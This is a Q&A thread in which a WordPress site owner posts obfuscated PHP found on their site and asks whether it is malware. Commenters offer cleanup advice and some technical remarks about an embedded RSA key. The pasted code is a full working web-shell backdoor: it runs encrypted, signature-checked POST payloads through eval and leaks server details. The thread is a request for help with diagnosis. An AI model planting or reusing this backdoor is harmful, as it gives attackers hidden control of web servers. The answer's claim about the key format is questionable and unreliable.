# obfuscated PHP code in wordpress is it virus?

Tags: php, wordpress

I was going through some of the codes of my WordPress website and realized some minified random PHP codes. These codes are hard to read with naked eyes.

now I'm wondering if this is a virus or what could it be? There are several files with such kind of code. Until someone helps me understand, I will treat it as a virus

```
<?php $_5fc427e4='aes-128-cbc';$_be5af5e5='//CWWSUBSCRIPT//';$_ca907758='LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDc2x3Q3gzN3pXUnl6TmxwTlJEUDE1MUt0NgpRa01LYURJL0VMblJwMERTb1dCTVhoMzdtSjhWb25FdjZYdVJmTlFMZUwwZ3ljVFFmY0NxSWZHV3lxdXN6WFowCi9YbC9MZmdwZFFhQVFEYzJLNDNwWE1CRTJJMmJROWVScFFMRFQrYVNWdlNqa01lSFR1Zy9QU1VjZFM1cjJQaTkKYVFLZVBvNGxyWHRldHpOMDNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQo=';$VERSION="0.3.0";$ID=$VERSION.' php-'.PHP_VERSION.'/'.PHP_OS.'/'.$_SERVER['SERVER_SOFTWARE'];error_reporting(0);@set_time_limit(3600);@ini_set('implicit_flush','On');@ini_set('default_socket_timeout','3600');@ini_set('file_uploads','On');@ini_set('max_execution_time','3600');@ini_set('max_input_time','3600');@ini_set('upload_max_filesize','32M');@ini_set('post_max_size','32M');$_b632135e=$_SERVER['REQUEST_METHOD'][0]?$_SERVER['REQUEST_METHOD'][0]: 'P';if($_b632135e=='G'){if(isset($_GET['debug'])&&_f454d8cb('./cwwdebug.data',$_GET['debug'])){error_reporting(-1);_99412630();exit;}}if($_b632135e!='P'){_b8e6b0c7(10);}$_7a03a6d6=false;foreach($_SERVER as $_52b6f489=>$_7a03a6d6){if(strtolower($_52b6f489)=='http_x_cww_tag'){$_7a03a6d6=pack("H*",$_7a03a6d6);break;}}if($_7a03a6d6===false)_b8e6b0c7(20);$_897afce9=false;$_2ae84ba2=openssl_pkey_get_public(base64_decode($_ca907758));openssl_public_decrypt($_7a03a6d6,$_897afce9,$_2ae84ba2);openssl_free_key($_2ae84ba2);if(!$_897afce9)_b8e6b0c7(30);$_0496934c=preg_match_all('/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',$_897afce9,$_ed0783be);if(!$_0496934c)_b8e6b0c7(40);if($_ed0783be[1][0]<time())_b8e6b0c7(50);$_011ea5f3=array();$_011ea5f3[0]=pack("H*",$_ed0783be[2][0]);$_011ea5f3[1]=pack("H*",$_ed0783be[3][0]);if(eval('return 1;'))$_6ebae9e7=1;else if(is_callable('create_function'))$_6ebae9e7=2;else if(is_callable('file_put_contents'))$_6ebae9e7=3;else _b8e6b0c7(60);$_f178c330=array();for($i=9;$i>=0;$i--){$_ffc1d021=_35d71fd2($_POST[$i],$_f178c330[$i]);if($_ffc1d021>0)_b8e6b0c7($_ffc1d021+70);}if(empty($_f178c330[9]))_b8e6b0c7(80);while(@ob_end_clean());$_5daa2f51=32;ob_start('_97e99099',2);_b8e6b0c7(0);for($_3713da68=0;$_3713da68<=9;$_3713da68++){if(empty($_f178c330[$_3713da68]))continue;$_d84792e0=false;switch($_6ebae9e7){case 1: if(!eval($_f178c330[$_3713da68]))$_d84792e0=true;break;case 2: if(!call_user_func(create_function(null,$_f178c330[$_3713da68])))$_d84792e0=true;break;case 3: $_2226298e=tempnam(sys_get_temp_dir(),time());if(file_put_contents($_2226298e,"<?php\n".$_f178c330[$_3713da68]."\nreturn false;\n?".'>')){if(!(include($_2226298e)))$_d84792e0=true;unlink($_2226298e);}else{$_d84792e0=true;}break;}if($_d84792e0)_b8e6b0c7(90+$_3713da68);}ob_end_flush();while(@ob_end_flush());exit;function _b8e6b0c7($_4a728cd2){global $ID;if($_4a728cd2>0){header("HTTP/1.1 202 $_4a728cd2");header('Connection: close',true);}else{header('HTTP/1.1 200 OK');}header("X-Cww-Id: ".(implode(unpack("H*",$ID))));header('Cache-Control: must-revalidate');header('Pragma: no-cache');header('Expires: Thu,1 Jan 1970 00:00:01 GMT');flush();if(!$_4a728cd2)return;exit;}function _ceee992a(&$_5063af5c,&$_22acf907){global $_011ea5f3,$_5fc427e4;$_22acf907=openssl_decrypt($_5063af5c,$_5fc427e4,$_011ea5f3[0],false,$_011ea5f3[1]);return $_22acf907||false;}function _cf76f9f4(&$_269f3677,&$_5063af5c){global $_011ea5f3,$_5fc427e4;$_5063af5c=openssl_encrypt($_269f3677,$_5fc427e4,$_011ea5f3[0],false,$_011ea5f3[1]);return $_5063af5c||false;}function _2e082d06(&$_16ae1ab0,&$_298c83b2){if(function_exists('gzdecode')){$_298c83b2=gzdecode($_16ae1ab0);return $_298c83b2||false;}else if(substr($_16ae1ab0,0,3)=="\x1f\x8b\x08"){$_3713da68=10;$_d59a8e8c=ord(substr($_16ae1ab0,3,1));if($_d59a8e8c>0){if($_d59a8e8c & 4){list($_c4c8650e)=unpack('v',substr($_16ae1ab0,$_3713da68,2));$_3713da68+=(2+$_c4c8650e);}if($_d59a8e8c & 8)$_3713da68=strpos($_16ae1ab0,"\0",$_3713da68)+1;if($_d59a8e8c & 16)$_3713da68=strpos($_16ae1ab0,"\0",$_3713da68)+1;if($_d59a8e8c & 2)$_3713da68+=2;}$_298c83b2=gzinflate(substr($_16ae1ab0,$_3713da68,-8));return $_298c83b2||false;}return false;}function _35d71fd2(&$_5063af5c,&$_22acf907){global $_be5af5e5;if(empty($_5063af5c))return-1;$_16ae1ab0=false;if(!_ceee992a($_5063af5c,$_16ae1ab0))return 1;if(!_2e082d06($_16ae1ab0,$_22acf907))return 2;$_c891de4a=strpos($_22acf907,$_be5af5e5);if($_c891de4a===false||$_c891de4a!=0)return 3;return 0;}$_1e23290b='';$_ab7bcfbf=0;function _97e99099($_c9fd7070,$_b46ca1b2){global $_1e23290b,$_ab7bcfbf,$_5daa2f51;$_1e23290b.=$_c9fd7070;$_ab7bcfbf++;$_4b8df1b0=NULL;if($_1e23290b&&($_b46ca1b2||$_ab7bcfbf>$_5daa2f51)){global $_011ea5f3;$_4d08b43b=gzencode($_1e23290b);_cf76f9f4($_4d08b43b,$_4b8df1b0,$_011ea5f3[0],$_011ea5f3[1]);$_4b8df1b0.="\n";$_ab7bcfbf=0;$_1e23290b=NULL;}return $_4b8df1b0;}function _f454d8cb($_81a3c9f8,$_ec530a51){if($_68727f18=fopen($_81a3c9f8,'r')){$_f4de9e3e=fgets($_68727f18);fclose($_68727f18);return $_ec530a51==trim($_f4de9e3e);}return false;}function _99412630(){global $ID;echo "<html><pre>\n";echo "OUR VERSION: ".(pack("H*",$ID))."\n\n";echo "GLOBAL VARS:\n";print_r($GLOBALS);$_227afe03=array('openssl_get_cipher_methods','openssl_pkey_get_private','openssl_private_decrypt','openssl_decrypt','openssl_encrypt','gzdecode','gzencode','gzinflate','create_function','call_user_func','file_put_contents','tempnam',);echo "\n\nAVAILABLE FUNCTIONS:\n";foreach($_227afe03 as $f){echo "$f():\te:".(function_exists($f)+0).',c:'.(is_callable($f)+0)."\n";}echo "\n\nCURRENT DIR AND STATS:\n";echo(getcwd())."\n";print_r(stat('.'));if(is_callable('openssl_get_cipher_methods')){echo "\n\nOPENSSL SUPPORTED METHODS:\n";print_r(openssl_get_cipher_methods());}echo "\n\nTHIS SERVER DATE/TIME:\n";echo(date('r'));if(is_callable('phpinfo')){echo "\n\nPHP INFO:\n";ob_start();phpinfo();$_aabae31f=ob_get_contents();ob_end_clean();$_aabae31f=preg_replace('/<[^>]+>/i',"\t",$_aabae31f);echo "$_aabae31f\n</pre></html>";}else{echo "\n\nPHP INFO:(func is not callable)\n";}} ?>
```

Comment: If this has appeared on your site and you didn't put it there then you have been hacked. You can't be sure that you'll find all the rogue code, and even if you did, you need to fix the weakness that allowed the hacker in, so... Delete the entire site and restore from the last clean backup. Assess all plugins and other extensions and discard any that are old, out of date, unsupported. Be particularly thorough with any code you have written. Rebuild your site with new extensions.

Answer (score 0):

This contains a RSA public key:

```
-----BEGIN PUBLIC KEY-----

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCslwCx37zWRyzNlpNRDP151Kt6
QkMKaDI/ELnRp0DSoWBMXh37mJ8VonEv6XuRfNQLeL0gycTQfcCqIfGWyquszXZ0
/Xl/LfgpdQaAQDc2K43pXMBE2I2bQ9eRpQLDT+aSVvSjkMeHTug/PSUcdS5r2Pi9
aQKePo4lrXtetzN03QIDAQAB

-----END PUBLIC KEY-----
```

Note that your file is weird. A RSA public key consists of two integers, the modulus (n) and the public exponent (e). It is normally encoded as an ASN.1 structure that is a SEQUENCE of two INTEGER values. That structure is then supposed to be DER-encoded, and the resulting sequence of bytes to become the contents of a BIT STRING in another, outer ASN.1 structure that also contains an explicit identifier for the key type (i.e. an indication that the key is really of type RSA).

In your case, that outer structure is missing. So there is formally no indication, neither in the encoded ASN.1 structure, nor in the PEM header ("BEGIN PUBLIC KEY"), that the key is an RSA key.

Comment: Would you treat that code as suspicious? And what is its purpose on wp?

Comment: I fail to see how this addresses the question in any way.

Comment: @Karue Benson Karue
When we decrypt it; Binary content can be seen inside it, which is usually suspicious